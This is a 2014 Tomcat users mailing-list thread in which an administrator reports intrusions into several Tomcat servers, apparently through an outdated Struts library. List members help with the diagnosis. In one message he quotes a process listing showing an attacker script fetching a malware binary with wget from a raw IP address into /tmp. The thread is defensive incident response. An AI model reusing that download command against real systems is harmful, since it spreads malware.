Re: Regarding i think an intrusion - Solved =)

2014-06-04 Thread Leonardo Santagostini
>> >> 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini > >: >> >> Hello all ! >>> >>> Developers are still "estimating the effort" for upgrading struts i >>> will let you know how things are going. >>> >>> T

Re: Regarding i think an intrusion

2014-05-26 Thread Leonardo Santagostini
for upgrading struts i >> will let you know how things are going. >> >> Thanks all for replying me. >> >> Regards, >> Leonardo >> >> Saludos.- >> Leonardo Santagostini >> >> <http://ar.linkedin.com/in/santagostini>

Re: Regarding i think an intrusion

2014-05-20 Thread Leonardo Santagostini
> Saludos.- > Leonardo Santagostini > > <http://ar.linkedin.com/in/santagostini> > > > > > > 2014-05-05 15:39 GMT-03:00 Martin Gainty : > >> > Subject: Re: Regarding i think an intrusion >> > From: lsantagost...@gmail.com >> > To: users

Re: Regarding i think an intrusion

2014-05-12 Thread Leonardo Santagostini
00 Martin Gainty : > > Subject: Re: Regarding i think an intrusion > > From: lsantagost...@gmail.com > > To: users@tomcat.apache.org > > > > Hello Chris, but this logfile was only one day. > MG>Ay Caramba! > > > > Maybe i had a concept mismatch tr

RE: Regarding i think an intrusion

2014-05-05 Thread Martin Gainty
> Subject: Re: Regarding i think an intrusion > From: lsantagost...@gmail.com > To: users@tomcat.apache.org > > Hello Chris, but this logfile was only one day. MG>Ay Caramba! > > Maybe i had a concept mismatch trying to capture the exact moment when the > execution

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Hello Chris, but this logfile was only one day. Maybe I had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea

Re: Regarding i think an intrusion

2014-05-05 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 11:12 AM, Leonardo Santagostini wrote: > Ok, again its uploaded. > > This is the link > > https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing 1/2 > GiB log file? Hrm. It doesn't even have any calls

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Ok, again it's uploaded. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing Kind regards!, Leonardo Saludos.- Leonardo Santagostini 2014-05-05 11:57 GMT-03:00 Christopher Schultz : > -BEGIN PGP S

Re: Regarding i think an intrusion

2014-05-05 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 10:29 AM, Leonardo Santagostini wrote: > Well thread dump is here > > https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Seems > like it's broken. - -chris -BEGIN PGP SIGNATURE- Version: Gn

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Well, the thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Let me know if I'm missing something. Thanks! Leonardo Saludos.- Leonardo Santagostini 2014-05-05 9:34 GMT-03:00 Leonardo Santagostini : > Hell

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Hello all, sorry for the delay, but I was on holiday from Wednesday. Ok, I made a ticket to developers for upgrading Struts. They told me that they will work on that. So, I will keep in touch with the news =) Again, thanks all for all the support you gave me. Regards, Leonardo Saludos.- Leonardo Sant

Re: Regarding i think an intrusion

2014-05-01 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: > 2014-04-30 19:07 GMT+02:00 Christopher Schultz > > : > > Leonardo, > > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finishe

Re: Regarding i think an intrusion

2014-05-01 Thread Cédric Couralet
2014-04-30 19:07 GMT+02:00 Christopher Schultz : > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA256 > > Leonardo, > > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: > > Im uploading mi logfiles so it will be available when finished > > uploading. > > Remember to get a thread dump while Runtim

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello Christopher, thanks for your response. I have a copy of 4.sh and squid (binary ELF file) and tried to see using strings what this program does. I couldn't see anything =( I'm monitoring the server to get a dump at the moment this injection occurs. Files still uploading =( Thanks for al

Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: > Im uploading mi logfiles so it will be available when finished > uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewher

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello Martin/Felix, I'm uploading my logfiles so they will be available when finished uploading. Regarding the configuration, it's working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer.

Re: Regarding i think an intrusion

2014-04-30 Thread Felix Schumacher
On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini wrote: >Hello list, > >well my homework is done > >Here are the links: > >setenv.sh: http://pastebin.com/EN1mXDFi >catalina.sh: http://pastebin.com/1vRVLbSm >web.xml: http://pastebin.com/BqEfiXXm >server.xml: http://pastebin.com/wfzE8bYU >l

RE: Regarding i think an intrusion

2014-04-30 Thread Martin Gainty
> Date: Wed, 30 Apr 2014 12:35:52 -0300 > Subject: Re: Regarding i think an intrusion > From: lsantagost...@gmail.com > To: users@tomcat.apache.org > > Hello list, > > well my homework is done > > Here are the links: > > setenv.sh: http://paste

Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, You need to post a thread dump as well. - -chris On 4/30/14, 11:35 AM, Leonardo Santagostini wrote: > Hello list, > > well my homework is done > > Here are the links: > > setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: > http://

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello list, well, my homework is done. Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://p

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Ok, I will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config. I think by midday I will have all the info. Thanks all for replying to me and for all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini

Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini > : >> Hello Dan, >> >> Nop, the attacker is executing locally the following >> >> tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp

Re: Regarding i think an intrusion

2014-04-29 Thread Konstantin Kolinko
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini : > Hello Dan, > > Nop, the attacker is executing locally the following > > tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh > tomcat8893 8882 0 Apr27 ?00:00:00 wget > http://218.199.102.59/.xy/squid32 -O /tmp/squid > > And t

Re: Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Sorry, but I forgot to post /usr/java/default/bin/java -version java version "1.6.0_41" Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) Saludos.- Leonardo Santagostini 2014-04-29 1

Re: Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Hello Dan, Nope, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And then launches squid, which tries to connect via ssh to various places.

Re: Regarding i think an intrusion

2014-04-29 Thread Daniel Mikusa
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini wrote: > Hello list, > > Im facing an issue in 6 tomcat server that are getting penetrated and they > are executing malicious scripts on my server. Can you share more about what they are doing? It might give some clues as to how they are ac

Re: Regarding i think an intrusion

2014-04-29 Thread JB MORLA
Hi, I am learning to set up a server and I found this article about security http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini < lsantagost...@gmail.com> wrote: > Hello list, > > Im facing an issue in 6 tomcat server that a